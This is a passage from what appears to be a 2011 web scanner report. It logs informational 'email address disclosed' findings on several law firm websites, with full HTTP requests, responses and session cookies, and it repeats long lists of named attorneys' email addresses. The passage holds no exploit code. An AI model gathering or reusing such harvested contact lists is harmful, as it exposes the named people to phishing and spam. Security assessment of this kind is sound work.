User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 4865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="mailto:registrar@lawseminars.com">registrar@lawseminars.com</a>
...[SNIP]...
27.21. http://www.mccarter.com/new/contactnew.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/contactnew.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /new/contactnew.aspx HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=contactnew
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:15:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOO
...[SNIP]...
<a href="mailto:info@mccarter.com">
                           <span font-color="#000000">info@mccarter.com</span>
...[SNIP]...
27.22. http://www.mccarter.com/new/homenew.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /new/homenew.aspx?searchlink=showbionew&show=997 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/showeventnew.aspx?show=6164
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:17:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 44221


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<a encrypted="true" href="mailto:rimcyt@iumdnxmn.gwj" >cmayer@mccarter.com</a>
...[SNIP]...
27.23. http://www.mccarter.com/new/privacynew.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/privacynew.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /new/privacynew.aspx HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17085


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOO
...[SNIP]...
<p>The information provided on this page includes the McCarter
                                   &amp; English, LLP Disclaimer and Privacy Statement. Please contact us at
                                   info@mccarter.com if you need more information.</p>
...[SNIP]...
27.24. http://www.mccarter.com/new/showcareerpagenew.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/showcareerpagenew.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /new/showcareerpagenew.aspx?show=1284 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showcareerpagenew.aspx&show=1284
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:15:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>McCarter&amp;English | Welcome</title>        
       
<meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
<a target=_top href="mailto:recruiting@mccarter.com">recruiting@mccarter.com</a><a target=_top href="mailto:aauman@mccarter.com">
...[SNIP]...
27.25. http://www.mccarter.com/new/showeventnew.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/showeventnew.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /new/showeventnew.aspx?show=6164 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/eventsnew.aspx
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:17:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27653


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
   
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOOD
...[SNIP]...
<a target=_top href="mailto:cbongard@mccarter.com"><u><font color=#0000ff>cbongard@mccarter.com</font>
...[SNIP]...
27.26. http://www.milbank.com/en/Alumni/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /en/Alumni/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/Alumni/ HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en
Cookie: ASP.NET_SessionId=4togva55elerdtfoo2gq0455

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Milbank Alumni</title>
       
       <meta name="GENERAT
...[SNIP]...
<a title="mailto:alumni@milbank.com" href="mailto:alumni@milbank.com">alumni@milbank.com</a>
...[SNIP]...
27.27. http://www.milbank.com/en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milbank.com
Path:   /en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.milbank.com/en
Cookie: ASP.NET_SessionId=4togva55elerdtfoo2gq0455

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:59:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>
           Milbank Represents Lenders in Financing of T
...[SNIP]...
<a href="mailto:megan@berbay.com">megan@berbay.com</a>
...[SNIP]...
27.28. http://www.moritthock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: exp_last_visit=989860893; exp_last_activity=1305221465; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz
If-Modified-Since: Thu, 12 May 2011 12:21:34 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_visit=1305221465; expires=Fri, 11-May-2012 16:09:32 GMT; path=/
Set-Cookie: exp_last_activity=1305234572; expires=Fri, 11-May-2012 16:09:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:09:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...
<a href="mailto:tarenth@moritthock.com">
...[SNIP]...
<a href="mailto:lberkoff@moritthock.com">
...[SNIP]...
<a href="mailto:kbraun@moritthock.com">
...[SNIP]...
<a href="mailto:mcardello@moritthock.com">
...[SNIP]...
<a href="mailto:cclarke@moritthock.com">
...[SNIP]...
<a href="mailto:rcohen@moritthock.com">
...[SNIP]...
<a href="mailto:dcohen@moritthock.com">
...[SNIP]...
<a href="mailto:tdriscoll@moritthock.com">
...[SNIP]...
<a href="mailto:mespey@moritthock.com">
...[SNIP]...
<a href="mailto:rfernbach@moritthock.com">
...[SNIP]...
<a href="mailto:bgarver@moritthock.com">
...[SNIP]...
<a href="mailto:bgeizhals@moritthock.com">
...[SNIP]...
<a href="mailto:sginsberg@moritthock.com">
...[SNIP]...
<a href="mailto:mgreenberg@moritthock.com">
...[SNIP]...
<a href="mailto:chamada@moritthock.com">
...[SNIP]...
<a href="mailto:nhampton@moritthock.com">
...[SNIP]...
<a href="mailto:mhamroff@moritthock.com">
...[SNIP]...
<a href="mailto:wheberer@moritthock.com">
...[SNIP]...
<a href="mailto:ghisiger@moritthock.com">
...[SNIP]...
<a href="mailto:ahock@moritthock.com">
...[SNIP]...
<a href="mailto:bklineberg@moritthock.com">
...[SNIP]...
<a href="mailto:hklosowski@moritthock.com">
...[SNIP]...
<a href="mailto:lkoroleva@moritthock.com">
...[SNIP]...
<a href="mailto:dkucica@moritthock.com">
...[SNIP]...
<a href="mailto:wlaino@moritthock.com">
...[SNIP]...
<a href="mailto:klawrence@moritthock.com">
...[SNIP]...
<a href="mailto:emencher@moritthock.com">
...[SNIP]...
<a href="mailto:lmendelson@moritthock.com">
...[SNIP]...
<a href="mailto:nmoritt@moritthock.com">
...[SNIP]...
<a href="mailto:joneil@moritthock.com">
...[SNIP]...
<a href="mailto:dorourke@moritthock.com">
...[SNIP]...
<a href="mailto:lpistilli@moritthock.com">
...[SNIP]...
<a href="mailto:mre@moritthock.com">
...[SNIP]...
<a href="mailto:dsaperman@moritthock.com">
...[SNIP]...
<a href="mailto:rschonfeld@moritthock.com">
...[SNIP]...
<a href="mailto:sstein@moritthock.com">
...[SNIP]...
<a href="mailto:jsummers@moritthock.com">
...[SNIP]...
<a href="mailto:rtils@moritthock.com">
...[SNIP]...
<a href="mailto:jtrafimow@moritthock.com">
...[SNIP]...
<a href="mailto:sturman@moritthock.com">
...[SNIP]...
<a href="mailto:ewalsh@moritthock.com">
...[SNIP]...
<a href="mailto:dwechsler@moritthock.com">
...[SNIP]...
<a href="mailto:rzelin@moritthock.com">
...[SNIP]...
27.29. http://www.moritthock.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php HTTP/1.1
Host: www.moritthock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; __utma=175020734.1039693598.1305202900.1305202900.1305216575.2; exp_last_visit=1305221465; __utmc=175020734; exp_last_activity=1305236919; __utmb=175020734.1.10.1305216575; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305237339; expires=Fri, 11-May-2012 16:55:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:55:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...
<a href="mailto:tarenth@moritthock.com">
...[SNIP]...
<a href="mailto:lberkoff@moritthock.com">
...[SNIP]...
<a href="mailto:kbraun@moritthock.com">
...[SNIP]...
<a href="mailto:mcardello@moritthock.com">
...[SNIP]...
<a href="mailto:cclarke@moritthock.com">
...[SNIP]...
<a href="mailto:rcohen@moritthock.com">
...[SNIP]...
<a href="mailto:dcohen@moritthock.com">
...[SNIP]...
<a href="mailto:tdriscoll@moritthock.com">
...[SNIP]...
<a href="mailto:mespey@moritthock.com">
...[SNIP]...
<a href="mailto:rfernbach@moritthock.com">
...[SNIP]...
<a href="mailto:bgarver@moritthock.com">
...[SNIP]...
<a href="mailto:bgeizhals@moritthock.com">
...[SNIP]...
<a href="mailto:sginsberg@moritthock.com">
...[SNIP]...
<a href="mailto:mgreenberg@moritthock.com">
...[SNIP]...
<a href="mailto:chamada@moritthock.com">
...[SNIP]...
<a href="mailto:nhampton@moritthock.com">
...[SNIP]...
<a href="mailto:mhamroff@moritthock.com">
...[SNIP]...
<a href="mailto:wheberer@moritthock.com">
...[SNIP]...
<a href="mailto:ghisiger@moritthock.com">
...[SNIP]...
<a href="mailto:ahock@moritthock.com">
...[SNIP]...
<a href="mailto:bklineberg@moritthock.com">
...[SNIP]...
<a href="mailto:hklosowski@moritthock.com">
...[SNIP]...
<a href="mailto:lkoroleva@moritthock.com">
...[SNIP]...
<a href="mailto:dkucica@moritthock.com">
...[SNIP]...
<a href="mailto:wlaino@moritthock.com">
...[SNIP]...
<a href="mailto:klawrence@moritthock.com">
...[SNIP]...
<a href="mailto:emencher@moritthock.com">
...[SNIP]...
<a href="mailto:lmendelson@moritthock.com">
...[SNIP]...
<a href="mailto:nmoritt@moritthock.com">
...[SNIP]...
<a href="mailto:joneil@moritthock.com">
...[SNIP]...
<a href="mailto:dorourke@moritthock.com">
...[SNIP]...
<a href="mailto:lpistilli@moritthock.com">
...[SNIP]...
<a href="mailto:mre@moritthock.com">
...[SNIP]...
<a href="mailto:dsaperman@moritthock.com">
...[SNIP]...
<a href="mailto:rschonfeld@moritthock.com">
...[SNIP]...
<a href="mailto:sstein@moritthock.com">
...[SNIP]...
<a href="mailto:jsummers@moritthock.com">
...[SNIP]...
<a href="mailto:rtils@moritthock.com">
...[SNIP]...
<a href="mailto:jtrafimow@moritthock.com">
...[SNIP]...
<a href="mailto:sturman@moritthock.com">
...[SNIP]...
<a href="mailto:ewalsh@moritthock.com">
...[SNIP]...
<a href="mailto:dwechsler@moritthock.com">
...[SNIP]...
<a href="mailto:rzelin@moritthock.com">
...[SNIP]...
27.30. http://www.moritthock.com/index.php/attorneys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/attorneys

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php/attorneys HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/news_events/television_media
Cookie: exp_last_visit=1305221465; exp_last_activity=1305237459; __utma=175020734.1039693598.1305202900.1305216575.1305218923.3; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:57:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305241052; expires=Fri, 11-May-2012 17:57:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 17:57:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Attorneys | Moritt Hock & H
...[SNIP]...
<a href="mailto:tarenth@moritthock.com">
...[SNIP]...
<a href="mailto:lberkoff@moritthock.com">
...[SNIP]...
<a href="mailto:kbraun@moritthock.com">
...[SNIP]...
<a href="mailto:mcardello@moritthock.com">
...[SNIP]...
<a href="mailto:cclarke@moritthock.com">
...[SNIP]...
<a href="mailto:rcohen@moritthock.com">
...[SNIP]...
<a href="mailto:dcohen@moritthock.com">
...[SNIP]...
<a href="mailto:tdriscoll@moritthock.com">
...[SNIP]...
<a href="mailto:mespey@moritthock.com">
...[SNIP]...
<a href="mailto:rfernbach@moritthock.com">
...[SNIP]...
<a href="mailto:bgarver@moritthock.com">
...[SNIP]...
<a href="mailto:bgeizhals@moritthock.com">
...[SNIP]...
<a href="mailto:sginsberg@moritthock.com">
...[SNIP]...
<a href="mailto:mgreenberg@moritthock.com">
...[SNIP]...
<a href="mailto:chamada@moritthock.com">
...[SNIP]...
<a href="mailto:nhampton@moritthock.com">
...[SNIP]...
<a href="mailto:mhamroff@moritthock.com">
...[SNIP]...
<a href="mailto:wheberer@moritthock.com">
...[SNIP]...
<a href="mailto:ghisiger@moritthock.com">
...[SNIP]...
<a href="mailto:ahock@moritthock.com">
...[SNIP]...
<a href="mailto:bklineberg@moritthock.com">
...[SNIP]...
<a href="mailto:hklosowski@moritthock.com">
...[SNIP]...
<a href="mailto:lkoroleva@moritthock.com">
...[SNIP]...
<a href="mailto:dkucica@moritthock.com">
...[SNIP]...
<a href="mailto:wlaino@moritthock.com">
...[SNIP]...
<a href="mailto:klawrence@moritthock.com">
...[SNIP]...
<a href="mailto:emencher@moritthock.com">
...[SNIP]...
<a href="mailto:lmendelson@moritthock.com">
...[SNIP]...
<a href="mailto:nmoritt@moritthock.com">
...[SNIP]...
<a href="mailto:joneil@moritthock.com">
...[SNIP]...
<a href="mailto:dorourke@moritthock.com">
...[SNIP]...
<a href="mailto:lpistilli@moritthock.com">
...[SNIP]...
<a href="mailto:mre@moritthock.com">
...[SNIP]...
<a href="mailto:dsaperman@moritthock.com">
...[SNIP]...
<a href="mailto:rschonfeld@moritthock.com">
...[SNIP]...
<a href="mailto:sstein@moritthock.com">
...[SNIP]...
<a href="mailto:jsummers@moritthock.com">
...[SNIP]...
<a href="mailto:rtils@moritthock.com">
...[SNIP]...
<a href="mailto:jtrafimow@moritthock.com">
...[SNIP]...
<a href="mailto:sturman@moritthock.com">
...[SNIP]...
<a href="mailto:ewalsh@moritthock.com">
...[SNIP]...
<a href="mailto:dwechsler@moritthock.com">
...[SNIP]...
<a href="mailto:rzelin@moritthock.com">
...[SNIP]...
27.31. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/attorneys/attorney/terese_l_arenth

Issue detail

The following email address was disclosed in the response:

Request

GET /index.php/attorneys/attorney/terese_l_arenth HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/attorneys
Cookie: exp_last_visit=1305221465; exp_last_activity=1305241051; __utma=175020734.1039693598.1305202900.1305218923.1305223056.4; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734; __utmb=175020734.1.10.1305223056

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:57:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305241062; expires=Fri, 11-May-2012 17:57:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fattorneys%2Fattorney%2Fterese_l_arenth%2F%22%3Bi%3A1%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A2%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 17:57:43 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Terese L. Arenth | Moritt Hoc
...[SNIP]...
<a href="mailto:tarenth@moritthock.com">tarenth@moritthock.com</a>
...[SNIP]...
27.32. http://www.ngelaw.com/attorney/bio.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/bio.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /attorney/bio.aspx?ID=1212 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/results.aspx?letter=M
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:55:11 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11585


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys | Hillary A. Mann</TITLE>
   </HEAD>
   <meta name="description" content="Hillary A. Mann Hillary A. Mann is a member of Neal Gerber
...[SNIP]...
<a href="javascript:ConfirmMail('hmann@ngelaw.com');">hmann@ngelaw.com</a>
...[SNIP]...
27.33. http://www.ngelaw.com/attorney/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/results.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /attorney/results.aspx HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
